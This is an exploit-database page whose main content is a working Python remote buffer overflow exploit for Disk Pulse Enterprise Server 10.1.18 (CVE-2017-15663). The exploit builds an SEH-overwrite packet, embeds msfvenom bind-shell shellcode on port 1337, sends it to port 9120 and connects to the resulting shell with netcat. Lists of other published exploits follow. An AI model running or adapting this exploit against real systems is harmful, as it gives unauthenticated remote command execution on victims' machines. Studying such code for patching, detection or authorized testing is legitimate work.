Menu

Search for hundreds of thousands of exploits

"Disk Pulse Enterprise 10.1.18 - Remote Buffer Overflow"

Author

Exploit author

"Ahmad Mahfouz"

Platform

Exploit platform

windows

Release date

Exploit published date

2018-01-15

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
# Exploit Title: Disk Pulse Enterprise Server v10.1.18 - Buffer Overflow
# Exploit Author: Ahmad Mahfouz 
# Description: Disk Pule Enterprise Server Unauthenticated Remote Buffer Overflow SEH
# Contact: http://twitter.com/eln1x
# Date: 12/01/2018
# CVE: CVE-2017-15663
# Version: v10.1.18 
# Tested on: Windows 7 x64
# Software Link: http://www.diskpulse.com/setups/diskpulsesrv_setup_v10.1.18.exe

 

from struct import pack
from os import system
from sys import exit
from time import sleep
import socket

 

port = 9120
host = '192.168.72.231'


stage1 = "\x83\xc4\x7f" *17 # metasm > add esp,127
stage1 += "\x83\xc4\x04"    # metasm > add esp,4
stage1 +=  "\xff\xe4"       # metasm > jmp esp
# msfvenom -a x86 --platform windows -p windows/shell_bind_tcp LPORT=1337 -f py -b '\x02'

buf =  "\x90" * 10 
buf += "\xb8\x01\x69\xed\x6f\xdd\xc3\xd9\x74\x24\xf4\x5a\x31"
buf += "\xc9\xb1\x53\x31\x42\x12\x83\xea\xfc\x03\x43\x67\x0f"
buf += "\x9a\xbf\x9f\x4d\x65\x3f\x60\x32\xef\xda\x51\x72\x8b"
buf += "\xaf\xc2\x42\xdf\xfd\xee\x29\x8d\x15\x64\x5f\x1a\x1a"
buf += "\xcd\xea\x7c\x15\xce\x47\xbc\x34\x4c\x9a\x91\x96\x6d"
buf += "\x55\xe4\xd7\xaa\x88\x05\x85\x63\xc6\xb8\x39\x07\x92"
buf += "\x00\xb2\x5b\x32\x01\x27\x2b\x35\x20\xf6\x27\x6c\xe2"
buf += "\xf9\xe4\x04\xab\xe1\xe9\x21\x65\x9a\xda\xde\x74\x4a"
buf += "\x13\x1e\xda\xb3\x9b\xed\x22\xf4\x1c\x0e\x51\x0c\x5f"
buf += "\xb3\x62\xcb\x1d\x6f\xe6\xcf\x86\xe4\x50\x2b\x36\x28"
buf += "\x06\xb8\x34\x85\x4c\xe6\x58\x18\x80\x9d\x65\x91\x27"
buf += "\x71\xec\xe1\x03\x55\xb4\xb2\x2a\xcc\x10\x14\x52\x0e"
buf += "\xfb\xc9\xf6\x45\x16\x1d\x8b\x04\x7f\xd2\xa6\xb6\x7f"
buf += "\x7c\xb0\xc5\x4d\x23\x6a\x41\xfe\xac\xb4\x96\x01\x87"
buf += "\x01\x08\xfc\x28\x72\x01\x3b\x7c\x22\x39\xea\xfd\xa9"
buf += "\xb9\x13\x28\x47\xb1\xb2\x83\x7a\x3c\x04\x74\x3b\xee"
buf += "\xed\x9e\xb4\xd1\x0e\xa1\x1e\x7a\xa6\x5c\xa1\x81\x0e"
buf += "\xe8\x47\xe3\x60\xbc\xd0\x9b\x42\x9b\xe8\x3c\xbc\xc9"
buf += "\x40\xaa\xf5\x1b\x56\xd5\x05\x0e\xf0\x41\x8e\x5d\xc4"
buf += "\x70\x91\x4b\x6c\xe5\x06\x01\xfd\x44\xb6\x16\xd4\x3e"
buf += "\x5b\x84\xb3\xbe\x12\xb5\x6b\xe9\x73\x0b\x62\x7f\x6e"
buf += "\x32\xdc\x9d\x73\xa2\x27\x25\xa8\x17\xa9\xa4\x3d\x23"
buf += "\x8d\xb6\xfb\xac\x89\xe2\x53\xfb\x47\x5c\x12\x55\x26"
buf += "\x36\xcc\x0a\xe0\xde\x89\x60\x33\x98\x95\xac\xc5\x44"
buf += "\x27\x19\x90\x7b\x88\xcd\x14\x04\xf4\x6d\xda\xdf\xbc"
buf += "\x9e\x91\x7d\x94\x36\x7c\x14\xa4\x5a\x7f\xc3\xeb\x62"
buf += "\xfc\xe1\x93\x90\x1c\x80\x96\xdd\x9a\x79\xeb\x4e\x4f"
buf += "\x7d\x58\x6e\x5a"

shellcode = buf
payload = 'A' * 124             #offset
payload +=  '\xeb\x09\x90\x90'  #jmp over seh retrun value
payload +=  '\xcd\x89\x06\x10' #0x100689cd : pop ebp # pop ebx # ret 0x04 |  {PAGE_EXECUTE_READ} [libspp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Program Files (x86)\Disk Pulse Enterprise\bin\libspp.dll)
payload += stage1 
payload +=  '\x90' * (1000 - len(payload) - len(shellcode))
payload += shellcode 

 

header = '\x75\x19\xba\xab'
header += '\x03\x00\x00\x00'
header += '\x00\x40\x00\x00'
header += pack('<I', len(payload))
header += pack('<I', len(payload))
header += pack('<I', ord(payload[-1]))
packet = header
packet += payload 

 

 

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

try:

    print "[*] Testing connection to tatget %s:%s" %(host,port)
    s.connect((host, port))

except:

    print "[-] Unable to communicate to target %s:%s" %(host,port)

    exit()

 

s.send(packet)

print "[*] Payload Sent.."
print "[*] Connecting to bind shell %s:1337 .." %host
sleep(3)
system("nc %s 1337"%host)
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2018-01-15 "Disk Pulse Enterprise 10.1.18 - Remote Buffer Overflow" remote windows "Ahmad Mahfouz"
2018-01-15 "SysGauge Server 3.6.18 - Remote Buffer Overflow" remote windows "Ahmad Mahfouz"
2018-01-15 "RISE 1.9 - 'search' SQL Injection" webapps php "Ahmad Mahfouz"
2018-01-15 "PerfexCRM 1.9.7 - Arbitrary File Upload" webapps php "Ahmad Mahfouz"
2018-01-10 "Muviko 1.1 - SQL Injection" webapps php "Ahmad Mahfouz"
2018-01-08 "Disk Pulse Enterprise 10.1.18 - Denial of Service" dos windows "Ahmad Mahfouz"
2018-01-08 "VX Search Enterprise 10.1.12 - Denial of Service" dos windows "Ahmad Mahfouz"
2018-01-08 "DiskBoss Enterprise 8.5.12 - Denial of Service" dos windows "Ahmad Mahfouz"
2018-01-08 "Sync Breeze Enterprise 10.1.16 - Denial of Service" dos windows "Ahmad Mahfouz"
2017-12-31 "PHP Melody 2.7.1 - 'playlist' SQL Injection" webapps php "Ahmad Mahfouz"
2017-12-27 "SysGauge Server 3.6.18 - Denial of Service" dos windows "Ahmad Mahfouz"
2017-12-27 "SAP BusinessObjects launch pad - Server-Side Request Forgery" webapps multiple "Ahmad Mahfouz"
2017-07-30 "DiskBoss Enterprise 8.2.14 - Remote Buffer Overflow" remote windows "Ahmad Mahfouz" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected